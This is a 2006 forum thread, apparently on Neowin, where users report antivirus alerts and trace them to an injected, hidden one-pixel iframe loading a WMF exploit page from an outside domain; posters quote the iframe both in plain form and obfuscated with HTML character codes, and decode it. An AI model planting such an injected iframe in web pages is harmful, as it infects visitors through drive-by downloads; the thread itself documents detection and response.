Sign in to follow this  
Followers 0
RaisinCain

Have the forums been hacked?

164 posts in this topic

Went to forums to post items for sale, clicked submit new post & BAM! NOD32 is going crazy saying that a trojan is trying to d/l through http. WTF?

Share this post


Link to post
Share on other sites

Any page that I browse to on the forums I get the following message from SAV:

Scan type: Auto-Protect Scan

Event: Threat Found!

Threat: Downloader

File: C:\Documents and Settings\Mark\Local Settings\Temporary Internet Files\Content.IE5\59Y2FM62\xpladv543[1].wmf

Location: C:\Documents and Settings\Mark\Local Settings\Temporary Internet Files\Content.IE5\59Y2FM62

Computer: JEDIMARK

User: Mark

Action taken: Clean failed : Quarantine failed : Access denied

Date found: 08 July 2006 09:55:36

(Please use small sizes for your images - Aaron)

I've scanned my computer and found nothing and it doesn't happen on any other websites?

Share this post


Link to post
Share on other sites

I'm getting this too. A lot of unpatched people are going to get hacked (edit: the WMF exploit was patched post-SP2).

Share this post


Link to post
Share on other sites

Me too, NOD is going nuts

Share this post


Link to post
Share on other sites

When browsing neowin forums, every page i load says it in infected with Exploit.WMF trojan

SFLKSFNJ!

Connects to site zchxsikpgz.biz

only happens at this forum, no other locations

Share this post


Link to post
Share on other sites

Same here too.

Share this post


Link to post
Share on other sites

nothing here....points to sig :D

Share this post


Link to post
Share on other sites

same here, big issues.. just posted about it, refreshed and seen this one

set your browser to higfh security temporary to stop it, just means most scripts wont work

Share this post


Link to post
Share on other sites

Place zchxsikpgz.biz in your restricted sites in IE.

Share this post


Link to post
Share on other sites

I'm in Firefox now, but when I was viewing Neowin in Internet Explorer seven different trojans appeared. :p

Share this post


Link to post
Share on other sites

McAfee is going crazy, something is definately wrong with neowin.

Share this post


Link to post
Share on other sites

No issues here. Running Konqueror 3.5.2 on Kubuntu 6.06.

Share this post


Link to post
Share on other sites

Yeah I'm getting a pop-up like the ones you get to type text into a site

post-63776-1152349850_thumb.jpg

Share this post


Link to post
Share on other sites

Anyone notify a MOD?

Share this post


Link to post
Share on other sites

THIS IS IN THE SOURCE NEAR TOP

<iframe src="http://zchxsikpgz.biz/dl/adv543.php" width=1 height=1></iframe>

but is hidden behind other char's

directly under <body>

Edited by iascoot

Share this post


Link to post
Share on other sites

No issues here. Running Konqueror 3.5.2 on Kubuntu 6.06.

It won't affect Linux only Windows users using IE.

Share this post


Link to post
Share on other sites

Yes, if anyone has contact with a Mod or someone higher, i think the site needs to go into maintnance. Nice spot guys (im on FF)

Share this post


Link to post
Share on other sites

i PM'ed REDMARK twice but no response,

i posted another post about this in forum issues and it got deleted but this one stayed so SOMEONE knows...

Share this post


Link to post
Share on other sites

I was going to PM Redmak but then I noticed he was viewing the topic already so I'm sure it will be sorted soon...

Share this post


Link to post
Share on other sites

It won't affect Linux only Windows users using IE.

he prolly just was being a smartass like i was in my post

Share this post


Link to post
Share on other sites

Check this out.

post-11110-1152350187_thumb.jpg

Share this post


Link to post
Share on other sites

&lt;iframe src=" 104; 116; 116; 112; 58; 47; 47; 122; 99; 104; 120; 115; 105; 107; 112; 103; 122; 46; 98; 105; 122; 47; 100; 108; 47; 97; 100; 118; 53; 52; 51; 46; 112; 104; 112;" width=1 height=1&gt;&lt;/iframe&gt;

When the HTML entities are decoded (" ;"), it is http://zchxsikpgz.biz/dl/adv543.php

Didn't affect Firefox, had to fire up IE7 Beta 3 to see it, and NOD32 stopped it.

Edited by Quick Reply

Share this post


Link to post
Share on other sites

Once that IFRAME is removed, everything should be fine. But how was the forum hacked in the first place???

Share this post


Link to post
Share on other sites

Can anyone post a selection of the source because I don't see it

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0

  • Recently Browsing   0 members

    No registered users viewing this page.